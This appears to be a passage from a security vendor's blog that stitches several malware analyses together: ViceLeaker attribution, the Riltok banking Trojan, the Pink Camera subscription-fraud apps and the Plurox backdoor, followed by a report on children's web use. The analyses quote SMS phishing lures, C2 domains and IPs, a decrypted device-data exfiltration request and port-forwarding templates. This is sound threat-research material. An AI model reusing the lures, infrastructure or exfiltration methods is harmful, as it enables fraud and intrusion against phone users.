The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers’ C2 server:

Comparison of the original “getKnownHosts” method (from Github) and the modified one

It appears that the attackers were using a specific C2 for the use of that app. Another important modification is in the message transfer process:

Comparison of the original Conversations method with the modified once

With this modification, an application sends device location coordinates with every message.

There are also many other modifications, fully described in our private report. In addition, we did not see traces of the Smali injection. In this case we found traces of dx/dexmerge compilers, which means that, this time, the attackers just imported the original source code into an Android IDE (such as Android Studio, for instance) and compiled it with their own modifications.

dx/dexmerge compiler of the modified Conversations samples

In addition to adding the code, the attackers also changed the icon and package name. We do not know why, but we suspect that it was an attempt to hide the origin of the application.

Conversations-based app mimics Telegram messenger

Even when we originally thought this was a backdoored version of the Conversations app, used to infect victims, we didn´t discovered anything malicious in it. This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other, unclear purposes. All the detections of this backdoored app were geolocated in Iran.

Backdoored Conversations C2 server analysis

During the analysis of the Smali injected apps and their C2 server infrastructure we hadn’t found any interesting clues, but things changed when we looked at the C2 server of the linked Conversations messenger. It uses “185.51.201[.]133” as a main C2 address, and there is only one domain that is hosted on this dedicated server – iliageram[.]ir. Note that we later found versions that used the domain as a C2 directly instead of the IP address. The record contains a personal email address:

WHOIS records of C2 server exposing the attacker’s email address

We were aware of the possibility that the attackers might be using a compromised email account, so we dug deeper to find more information related to this email address. A quick search produced results about a personal page and, what is more interesting, a GitHub account that contains a forked Conversation repository.

Related Github account contains forked Conversations repository

Summarizing all the found clues, we have the following attribution flow:


The operation of ViceLeaker is still ongoing, as is our research. The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner. Kaspersky Lab detects and blocks samples of the ViceLeaker operation using the following verdict: Trojan-Spy.AndroidOS.ViceLeaker.*

Actually, we are currently investigating whether this group might also be behind a large-scale web-oriented attack at the end of 2018 using code injection and exploiting SQL vulnerabilities. Even when this would not be directly related to the Android malware described in this blogpost, it would be an indicator of wider capabilities and objectives of this actor.

For more information about the ViceLeaker operation, contact us at: intelreports@kaspersky.com

2019. június 25.

Riltok mobile Trojan: A banker with global reach

Riltok is one of numerous families of mobile banking Trojans with standard (for such malware) functions and distribution methods. Originally intended to target the Russian audience, the banker was later adapted, with minimal modifications, for the European “market.” The bulk of its victims (more than 90%) reside in Russia, with France in second place (4%). Third place is shared by Italy, Ukraine, and the United Kingdom.

Geographic spread of the Riltok banking Trojan

We first detected members of this family back in March 2018. Like many other bankers, they were disguised as apps for popular free ad services in Russia. The malware was distributed from infected devices via SMS in the form “%USERNAME%, I’ll buy under a secure transaction. youlabuy[.]ru/7*****3” or “%USERNAME%, accept 25,000 on Youla youla-protect[.]ru/4*****7”, containing a link to download the Trojan. Other samples were also noticed, posing as a client of a ticket-finding service or as an app store for Android.

It was late 2018 when Riltok climbed onto the international stage. The cybercriminals behind it kept the same masking and distribution methods, using names and icons imitating those of popular free ad services.

Icons most frequently used by the Trojan: Avito, Youla, Gumtree, Leboncoin, Subito

In November 2018, a version of the Trojan for the English market appeared in the shape of Gumtree.apk. The SMS message with a link to a banker looked as follows: “%USERNAME%, i send you prepayment gumtree[.]cc/3*****1”.

Italian (Subito.apk) and French (Leboncoin.apk) versions appeared shortly afterwards in January 2019. The messages looked as follows:

  • “%USERNAME%, ti ho inviato il soldi sul subito subito-a[.]pw/6*****5” (It.)
  • “% USERNAME%, ti ho inviato il pagamento subitop[.]pw/4*****7” (It.)
  • “%USERNAME%, je vous ai envoyé un prepaiement m-leboncoin[.]top/7*****3” (Fr.)
  • “%USERNAME%, j’ai fait l’avance (suivi d’un lien): leboncoin-le[.]com/8*****9” (Fr.)

Let’s take a more detailed look at how this banking Trojan works.


The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service. There, they are prompted to download a new version of the mobile app, under which guise the Trojan is hidden. To be installed, it needs the victim to allow installation of apps from unknown sources in the device settings.

During installation, Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning:

If the user ignores or declines the request, the window keeps opening ad infinitum. After obtaining the desired rights, the Trojan sets itself as the default SMS app (by independently clicking Yes in AccessibilityService), before vanishing from the device screen.

After enabling AccessibilityService, the malware sets itself as the default SMS app

Now installed and having obtained the necessary permissions from the user, Riltok contacts its C&C server.

In later versions, when it starts, the Trojan additionally opens a phishing site in the browser that simulates a free ad service so as to dupe the user into entering their login credentials and bank card details. The entered data is forwarded to the cybercriminals.

Phishing page from the French version of the Trojan

Communication with C&C

Riltok actively communicates with its C&C server. First off, it registers the infected device in the administrative panel by sending a GET request to the relative address gate.php (in later versions gating.php) with the ID (device identifier generated by the setPsuedoID function in a pseudo-random way based on the device IMEI) and screen (shows if the device is active, possible values are “on”, “off”, “none”) parameters.

Then, using POST requests to the relative address report.php, it sends data about the device (IMEI, phone number, country, mobile operator, phone model, availability of root rights, OS version), list of contacts, list of installed apps, incoming SMS, and other information. From the server, the Trojan receives commands (for example, to send SMS) and changes in the configuration.

Trojan anatomy

The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan. The library includes such operations as:

  • Get address of cybercriminal C&C server
  • Get configuration file with web injects from C&C, as well as default list of injects
  • Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps
  • Set malware as default SMS app
  • Get address of the phishing page that opens when the app runs, and others

getStartWebUrl function – get address of phishing page

The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile banking app used by the user. In most so-called Western versions of the Trojan, the package names in the default configuration file are erased.

Sample configuration file of the Trojan

Through AccessibilityService, the malware monitors AccessibilityEvent events. Depending on which app (package name) generated the event, Riltok can:

  • Open a fake Google Play screen requesting bank card details
  • Open a fake screen or phishing page in a browser (inject) mimicking the screen of the relevant mobile banking app and requesting user/bank card details
  • Minimize the app (for example, antivirus applications or device security settings)

Additionally, the Trojan can hide notifications from certain banking apps.

List of package names of apps on events from which the Trojan opens a fake Google Play window (for the Russian version of the Trojan)

Example of Trojan screen overlapping other apps

When bank card details are entered in the fake window, Riltok performs basic validation checks: card validity period, number checksum, CVC length, whether the number is in the black list sewn into the Trojan code:

Examples of phishing pages imitating mobile banks

At the time of writing, the functionality of most of the Western versions of Riltok was somewhat pared down compared to the Russian one. For example, the default configuration file with injects is non-operational, and the malware contains no fake built-in windows requesting bank card details.


Threats are better prevented than cured, so do not follow suspicious links in SMS, and be sure to install apps only from official sources and check what permissions you are granting during installation. As Riltok shows, cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success.

Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok.



  • alr992.date
  • avito-app.pw
  • backfround2.pw
  • background1.xyz
  • blacksolider93.com
  • blass9g087.com
  • brekelter2.com
  • broplar3hf.xyz
  • buy-youla.ru
  • cd78cg210xy0.com
  • copsoiteess.com
  • farmatefc93.org
  • firstclinsop.com
  • holebrhuhh3.com
  • holebrhuhh45.com
  • karambga3j.net
  • le22999a.pw
  • leboncoin-bk.top
  • leboncoin-buy.pw
  • leboncoin-cz.info
  • leboncoin-f.pw
  • leboncoin-jp.info
  • leboncoin-kp.top
  • leboncoin-ny.info
  • leboncoin-ql.top
  • leboncoin-tr.info
  • myyoula.ru
  • sell-avito.ru
  • sell-youla.ru
  • sentel8ju67.com
  • subito-li.pw
  • subitop.pw
  • web-gumtree.com
  • whitehousejosh.com
  • whitekalgoy3.com
  • youlaprotect.ru

Examples of malware

  • 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98
  • 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa
  • 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe
  • 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745
  • bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a
  • dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811
  • e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049
  • ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5
  • f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df
2019. június 20.

Not-so-dear subscribers

Many people have had a run-in with subscriptions to mobile content providers. They appear out of the blue, and get discovered only when account funds run dry. It might seem that the obvious solution is not to visit dubious sites and not to install apps from third-party sources. But, alas, these days such advice is clearly not enough. We recently discovered several apps in Play Market directly related to such intrusive services.

Pink Camera (com.paint.oil) and Pink Camera 2 (com.psbo.forand) are identical save for the numeral in the name; each has been installed more than 10,000 times

On the face of it, they are ordinary photo editors, but suspicions start to creep in on perusing the list of permissions. For example, the apps request access to Wi-Fi controls, which is rather unusual for this type of software. What’s more, when run, the editors request access to notifications — and keep doing it till the user says “yes.” Next, while the user is trying to embellish a photo (using the meager functionality), the app collects information in the background about the device and sends it to the server ps.okyesmobi[.]com.

Example of a request received after decrypting app traffic:

{ "q1":"201905211050", // app ID "y":1184, // screen height "sign":"308F03D2E9173D9A1A43DFA15FDAF47D" "z":"PUSH", "e":"201905211050", "pl":"25011", // network operator code "cf":"111,108", "s1":"104870", "a":"862921000707889", // imei "i":720, // screen width "b":"250110201713837", // imsi "c":"unknown", "j":"ru", "d":"S10", // phone model "e1":1 // Wi-Fi status }

As can be seen, information is transmitted about the device and network operator. In response, the software receives a set of links (depending on the country and network operator) to the pages:

{ "sts":200, "ph":"", "js":[], "list": [ { "sta":0, "cf":"111", "dy":0, "tl":"http://of.okyesmobi[.]com/redirect?uid=F867D2329F195671825571419DB5B7FA67880B4E99583D6B&sourceid=2300&clickid=104870_112672190_250110201713837_862921000707889_201905211050_0.31_94.25.169.249", "id":0, "oid":112672190 } ], "cr": [ { "tl":"http://of.okyesmobi[.]com/redirect?uid=35092271DFB564AE09748A8CF282E15D089A4800D04DE5FE&sourceid=2300&clickid=104870_155608136_250110201713837_862921000707889_201905211050_0.36_94.25.169.249&p=1", "oid":155608136 }, { "tl":"http://of.okyesmobi[.]com/redirect?uid=71CBD61E0439CE5B6B6EF0BC46C140A842767CC39AC9A56E&sourceid=2300&clickid=104870_130581973_250110201713837_862921000707889_201905211050_0.24_94.25.169.249&p=1", "oid":130581973 } ], "wf":true }

After several redirects, the addresses take the user to a subscription page. Our technologies detect these pages as not-a-virus:HEUR:AdWare.Script.Linkury.gen.

Examples of “subscription” pages

On receiving the addresses of the malicious pages, the program loads them in a window unseen by the user. Before doing so, the app turns off Wi-Fi in the user’s phone, thereby activating mobile data to simplify the subscription process.

The app then decrypts a Java helper script stored in the app resources, and performs the actions required to activate the subscription:

  • It substitutes the user’s phone number (obtained while harvesting information) into the relevant field.
  • If the subscription page is CAPTCHA-protected, the app uses the image recognition service chaojiying[.] and automatically inserts the result into the relevant field on the page.
  • If an SMS code is required, the app gets it through access to notifications.
  • It clicks the “subscribe” button.
How to protect yourself

Analysis of pages loaded by the malware revealed the targets to be users from different countries, while its distribution through an official app store helped the authors to spread it far and wide. To avoid the hook and save money on your mobile phone account, we recommend carefully studying the list of requested permissions during app installation and installing a security solution on your smartphone capable of detecting this type of threat. Additionally, you can enable content-blocking options, or open a “content account” — a free service offered by some carriers for managing subscription payments.



  • 7F5C5A5F57650A44C10948926E107BA9E69B98D1CD1AD47AF0696B6CCCC08D13
  • E706EB74BAD44D2AF4DAA0C07E4D4FD8FFC2FC165B50ED34C7A25565E310C33B
  • 796A72004FAE62C43B1F02AA1ED48139DA7975B0BB416708BA8271573C462E79
  • C5CA6AA73FDCB523B5E63B52197F134F229792046CBAC525D46985AD72880395
  • B9038DC32DE0EA3619631B54585C247ECFD304B72532E193DED722084C4A7D1C
  • D4406DEE2C0E3E38A851CEA6FD5C4283E98497A894CA14A58B27D33A89B5ED5F
  • 59D64FBFF1E5A9AC1F8E29660ED9A76E5546CA07C2FF99FE56242FA43B5ABEC3
  • C5B6146D7C126774E5BB299E732F10655139056B72C28AA7AD478BD876D0537E
  • ps.okyesmobi[.]com:8802
2019. június 18.

Plurox: Modular backdoor

In February this year, a curious backdoor passed across our virtual desk. The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers. What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.

Key features

Plurox is written in C and complied with Mingw GCC, and judging by the presence of debug lines, the malware was at the testing stage when detected.

Debug lines in the samples we found

The backdoor uses the TCP protocol to communicate with the C&C server; plugins are loaded and directly interfaced via two different ports, which are stitched into the body of Plurox; the C&C addresses are also hardcoded into the bot. When monitoring the malware’s activity, we detected two “subnets.” In one, Plurox receives only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) from the C&C center, while in the other, besides miners (auto_opencl_amd, auto_miner), it is passed several plugins, which will be discussed later.

The Plurox family has virtually no encryption, only a few 4-byte keys are applied for the regular XOR cipher. The packet for calling the C&C server looks as follows:

The buffer contains an XORed string with the key at the start of the packet. The response from the C&C center contains the command to be executed, plus data for its execution, which is encrypted using XOR. When the plugin is loaded, the bot itself selects the required bitness and requests both auto_proc and auto_proc64. In response there arrives a packet with an encrypted plugin, the usual MZ-PE.

Supported commands

The Plurox version we found supports a total of seven commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin


During the monitoring, we managed to detect several Plurox plugins and study them all.

Plugin miners

The malware can install on the victim computer one of several cryptocurrency miners, depending on the particular system configuration. The bot sends the package with the system configuration to the C&C server, and in response it receives information about which plugin to download. We counted eight mining modules in total, whose features can be guessed from their names:

  • auto_proc
  • auto_cuda
  • auto_miner
  • auto_opencl_amd
  • auto_gpu_intel
  • auto_gpu_nvidia
  • auto_gpu_cuda
  • auto_gpu_amd
UPnP plugin

The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. It would take an attacker just five minutes to sort through all existing exploits for services running on these ports. If the administrators notice the attack on the host, they will see the attack coming directly from the router, not from a local machine. A successful attack will help the cybercriminals gain a foothold in the network.

According to its description, the plugin is very similar to EternalSilence, except that port 135 is forwarded instead of 139. See this Akamai article for details of EternalSilence:

{"NewProtocol": "TCP", "NewInternalPort": "445", "NewInternalClient": "",

"NewPortMappingDescription": "galleta silenciosa", "NewExternalPort": "47622"}

And here’s the Plurox plugin template:

<NewPortMappingDescription>galleta silenciosa</NewPortMappingDescription>

In the two examples, a matching line is highlighted — a description of port forwarding.

SMB plugin

This module is responsible for spreading malware over the network using the EternalBlue exploit. It is identical to the wormDll32 module from Trojan.Win32.Trickster, but with no debug lines in the code, plus the payload in the exploit is loaded using sockets.

Left: Plurox SMB plugin injected code, right: WormDll injected code

Left: Plurox SMB plugin NetServerEnum, right: Trickster WormDll NetServerEnum

As can be seen in these samples, not only is the injected code similar, but also the code for standard procedures. Based on this, we can assume that the analyzed samples were taken from the same source code (commented lines in the Trickster plugin are missing in the Plurox plugin), which means the respective creators of Plurox and Trickster may be linked.

Kaspersky Lab security solutions detect the bot and its plugins with the verdicts Backdoor.Win32.Plurox and HEUR:Trojan.Win32.Generic.


C&C servers

  • 178.21[.]11.90
  • 185.146[.]157.143
  • 37.140[.]199.65
  • 194.58[.]92.63
  • obuhov2k[.]beget[.]tech
  • webdynamicname[.]com
  • 37.46[.]131.250
  • 188.93[.]210.42
  • Main body
  • 59523DD8F5CE128B68EA44ED2EDD5FCA
  • C4A74D79030336A0C3CF60DE2CFAE9E9
  • CECFD6BCFDD56B5CC1C129740EA2C524
  • BE591AA0E48E496B781004D0E833E261
  • Trickster Worm module
  • f233dd609821c896a4cb342cf0afe7b2
  • auto_proc32
  • 2e55ae88c67b1d871049af022cc22aac
  • auto_proc64
  • b2d76d715a81862db84f216112fb6930
  • auto_opencl_amd32
  • a24fd434ffc7d3157272189753118fbf
  • auto_opencl_amd64
  • 117f978f07a658bce0b5751617e9d465
  • auto_miner32
  • 768857d6792ee7be1e1c5b60636501e5
  • auto_miner64
  • e8aed94c43c8c6f8218e0f2e9b57f083
  • upnp32
  • 8cf5c72217c1bb48902da2c83c9ccd4e
  • upnp64
  • b2824d2007c5a1077856ae6d8192f523
  • smb32
  • 6915dd5186c65891503f90e91d8716c6
  • smb64
  • cd68adc0fbd78117521b7995570333b2
2019. június 12.

What kids get up to online

Today’s children navigate the Internet better than adults. They are not afraid to try out new technology, and are quick to grasp new trends and sometimes invent their own. New social networks, mobile games, music, and gadgets are all part and parcel of their daily lives. But just because they feel at home online does not mean that they need not pay attention to potential hazards. To help children avoid potential dangers in the digital world, parents must understand what their children are interested in, know about the latest online trends, and be aware of what might pose a risk.

How statistics are collected

Kaspersky Lab solutions scan the content of web pages that children try to access. If a particular site belongs to one of fourteen unwanted categories, the module sends a notification to the Kaspersky Security Network (there is no transfer of personal user data and no violation of privacy). There are two important things to note about this:

  • Parents decide for themselves what content should be blocked and configure the application accordingly. However, anonymous statistics are collected across all fourteen categories.
  • Data is harvested only from computers running Windows and Mac OS; no mobile statistics are provided in this report.
Website categorization

In products that have Parental Control features, web filtering is currently performed across the following categories:

Filtering search queries

Children’s search activity is the best indicator of their interests. Kaspersky Safe Kids can filter children’s queries in five different search engines (Bing, Google, Mail.ru, Yahoo!, Yandex) on six potentially dangerous topics: Adult Content, Alcohol, Tobacco, Drugs, Racism, and Profanity.

We have grouped the search queries by language. We consider statistics for the English language as international due to its prevalence. All searches in a specific language, minus repeat queries, were taken as the 100% reference value. The popularity of each topic – defined as the percentage of queries about it – is calculated for each separate language and for the entire world.

Search queries sent to us during the period May 2018 – May 2019 were broken down into several thematic categories:

  • Alcohol, Tobacco, Drugs
  • Anime
  • News
  • Memes
  • Celebrities
  • Sports
  • Education
  • Music
  • Online Communication
  • Shopping
  • Online Translators
  • Adult Content
  • Video Games
  • Video
Global picture Site categories

Over the past year, the global picture has changed quite radically.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of Parental Control and Safe Kids notifications across fourteen categories, May 2018 – May 2019 (download)

A few years ago, we noted a downward trend in the number of visits from PCs to sites in the Online Communication category, and this is continuing. Whereas last year, the share of this category was 59.68%, this year has seen a sharp drop, to 27.61%. At the same time, the share of the Software, Audio, Video category rose to 32.75% against 22.4% last year.

Electronic Commerce ranks third; compared with the data for 2017-2018, the popularity of online stores among children increased dramatically, from 2.83% to 14.18%. Children have started accessing news resources more frequently: Last year, this category accounted for slightly less than one percent, while this year’s figure stands at 8.78%.

The share of computer game-related sites was 3.01%, which is 1.98 p.p. lower than in the previous reporting period. Meanwhile, the share of adult content sites climbed to 2.08%, which is up 1.34 percentage points on last year (0.74%). The share of sites in the Alcohol, Tobacco, Drugs category collapsed, amounting to 0.64% (6.32% in the last reporting period).

Search queries

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of users’ search queries by thematic category, May 2018 – May 2019 (download)

Children most commonly search for movies and cartoons on YouTube. Compared to last year, the share of search queries related to video content remained practically the same at 17.91% (17.25% in 2017-2018).

Although children visited gaming sites less frequently, they have not lost interest in the topic; the share of game-related search queries actually increased by 10.84 percentage points to 16.93%. Interest also rose in adult content (from 8.59% to 14.90%) and online shopping (from 2.4% to 8.72%). Meanwhile, interest in online translators remains at the same level as last year: 13.69% in 2018-2019 against 13.58% in the previous reporting period.

The number of queries related to social networks and online communication fell by a couple of percentage points, from 9.88% to 7.27%. This year, children searched more often for music (5.80% in 2018-2019 vs. 3.78% in 2017-2018) and topics related to education (5.45% vs. 4.86%), but there was a decline in the number of searches for anime (from 0.79% to 0.70%) and sports (from 3.69% to 3.40%).

Differences by region, country, and language

To understand the reasons behind the changes, we shall examine each of the popular categories in more detail, and take a look at the changes in different regions and countries.

Software, Audio, Video

Most often, children visited sites – and searched for information – relating to the Software, Audio, Video category.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of the Software, Audio, Video category in different regions, May 2018 – May 2019 (download)

Children in Africa more than anywhere else visit sites from this category. Their favorites include youtube.com, dvdvideosoft.com, dropbox.com, and play.google.com.

We see a rise in interest in this category in all regions with the exception of the Commonwealth of Independent States (CIS), where a slight drop occurred. This was the first year that we included the regions of Africa and South Asia in the statistics, so a comparison with the previous year is not possible.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of the Software, Audio, Video category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

The largest growth in visits to sites with video, music, and software was observed in Arab countries: Their share of the total number of visited resources grew significantly from 8.70% to 42.57%. The most visited resources in this region are youtube.com, dvdvideosoft.com, play.google.com, and uptv.ir.

There was a marked increase in Latin America, too, from 12.60% to 32.54%. The most visited sites in this region are, of course, youtube.com along with play.google.com, dvdvideosoft.com, and spotify.com.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of the Software, Audio, Video category in different countries, May 2017 – May 2018 (download)

Kids in China spend more time than others watching videos and listening to music (69.36%). Last year, China also beat all other countries in this respect, but with a larger figure (78.76%).

Since this time, we expanded the list of countries, some of last year’s frontrunners, such as Germany and Russia, are now closer to the foot of the ranking, although their share of visits did not change all that much: Germany (34.05%) saw a 2.09 p.p. swing and Russia, (28.23%) 4.95 p.p.

In some countries, children’s time spent on listening to music and watching videos shot up. The figure grew exponentially in Saudi Arabia (from 0.38% to 51.34%), which could be related to the launch of Spotify in the region, Egypt (from 11.03% to 40.28%), Mexico (from 10.65% to 42.37%), the UAE (from 9.17% to 23.29%), and Brazil (from 13.53% to 27.44%). In all these countries, the most popular site in this category is youtube.com.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Video topic in different languages, May 2018 – May 2019 (download)

As we have seen, the top topic in search queries around the world is video, which generally corresponds to the map of visited sites, where for the first time ever Software, Audio, Video has dislodged Online Communication as the leading category.

In the English language, the percentage of video-related search queries increased against last year from 20.54% to 28.35%. The most common searches were for “youtube,” “netflix,” and “amazon prime.” As in previous years, the most searched-for blogger is PewDiePie. The top cartoon channels are Nickelodeon, Disney, and Cartoon Network. There was also heightened interest in Game of Thrones.

The Video category’s share of searches among Chinese-speaking children this time around came to 21.12% (4.21% in the last reporting period). In Chinese, children searched for 愛奇藝 (iQiyi, the Chinese online video platform) and 復仇者聯盟4 (Avengers: Endgame).

Note that search queries in English reflect the interests not just of English-speaking children, but of all kids in general, since children worldwide often search for platforms, services, games, and social networks by their English names. In particular, the most popular site, as well as the most popular search query among children, is YouTube.

The graph below shows the percentage of YouTube-related search queries in different languages, with all other queries on the video topic (cartoons, movies, TV shows). In English, for example, 70.58% of all queries on the video topic are linked to YouTube. Only in China are children not interested in this video platform, since the service is blocked there.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of YouTube-related queries, and other searches on the video topic, May 2018 – May 2019 (download)

Another search topic in the Software, Audio, Video category is music. Compared to last year, children searched more often for songs, performers, and music videos. The sharpest hike in music-related queries came in the Japanese language, rising from 0.50% last year to 20.64% this year. This could be because Asian performers are wildly popular these days across the world, in particular the South Korean boy and girl bands BTS and BLACKPINK, and the Japanese virtual singer Hatsune Miku.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of thematic search queries on the music topic by language, May 2018 – May 2019 (download)

Besides music from Asia, children searched in English for the streaming service Spotify, singer Ariana Grande, rapper xxxtentacion (we wrote about him here), performer Marshmello, and singer Billie Eilish.

Online Communication

Each of our reports in recent years has noted a downward trend in children’s use of social networking sites and instant messengers on PCs. And now the day has come when the usual leader Online Communication has given way to video and music as the top category.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of the Internet Communication Media category in different regions, May 2018 – May 2019 (download)

Nevertheless, in our report’s new region, South Asia, children still communicate a lot online using desktops and laptops. In all other regions, we noticed a sharp drop in the number of visits. Facebook remains the most popular site in this category in practically all countries, with the exception of China.

Such a sharp drop in popularity can be put down to the craze among children and teenagers for the “mobile” social network TikTok (we wrote about it on our Kids Kaspersky portal, dedicated to keeping children safe). The steep decline could also be caused by the trend we have long observed for children to increasingly favor mobile over PC-based communication.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the popularity of websites in the Internet Communication Media category in different regions, May 2017 – May 2018 and May 2018 – May 2019 (download)

Interestingly, as with the Software, Audio, Video category, the largest difference between the reporting periods is seen in Arab and Latin American countries.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Popularity of websites in the Internet Communication Media category in different countries, May 2018 – May 2019 (download)

The country-specific data also shows a decline in visits to sites in the Online Communication category. This could be due to various factors, including the scandals around Facebook and VKontakte over the confidentiality of user data, as well as with the growing popularity of “mobile” social networks, such as Instagram, SnapChat, and TikTok.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the social networks topic in different languages, May 2018 – May 2019 (download)

